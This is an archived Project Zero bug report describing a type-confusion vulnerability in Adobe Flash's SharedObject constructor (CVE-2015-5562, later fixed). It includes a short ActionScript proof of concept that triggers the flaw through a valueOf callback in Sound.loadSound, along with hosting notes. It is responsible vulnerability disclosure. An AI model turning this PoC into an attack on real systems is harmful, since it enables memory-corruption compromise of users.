Adobe Flash: Shared Object Lacks Normal Check

[GoogleCodeExporter]

The Shared Object constructor does not check that the object it is provided is 
of type Object before setting it to be of type SharedObject. This can cause 
problems if another method (such as Sound.loadSound) calls into script between 
checking the input object type, and casting its native object. A PoC is as 
follows:

class subso extends Sound{

    public function subso(f){

    super("_level0.test");
    var n = {valueOf : func};
    _global.func = f;
    _global.t = this;
    var f2 = this.loadSound;
    f2.call(this, n, 1);
}

function func(){

    _global.func(_global.t,"/sosuper.swf", "/sosuper.swf");
    return 1;
    }
}

A sample fla, swf and AS file are attached. Note that this PoC needs to be 
hosted on a webserver to work and only works on 32-bit systems (tested on 
Windows Chrome). song1.mp3 should be put in the same folder on the server as 
the swf, it is needed for loadSound to work. This bug is likely only 
exploitable on 32-bit systems due to how the type-confused fields line up.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 8 Jun 2015 at 11:42

Attachments:

• sosuper.swf
• song1.mp3
• subso.as
• sosuper.fla

[GoogleCodeExporter]

Original comment by natashe...@google.com on 11 Aug 2015 at 3:17

• Changed state: Fixed
• Added labels: CVE-2015-5562, Id-3802

[GoogleCodeExporter]

Original comment by natashe...@google.com on 18 Aug 2015 at 7:43

• Removed labels: Restrict-View-Commit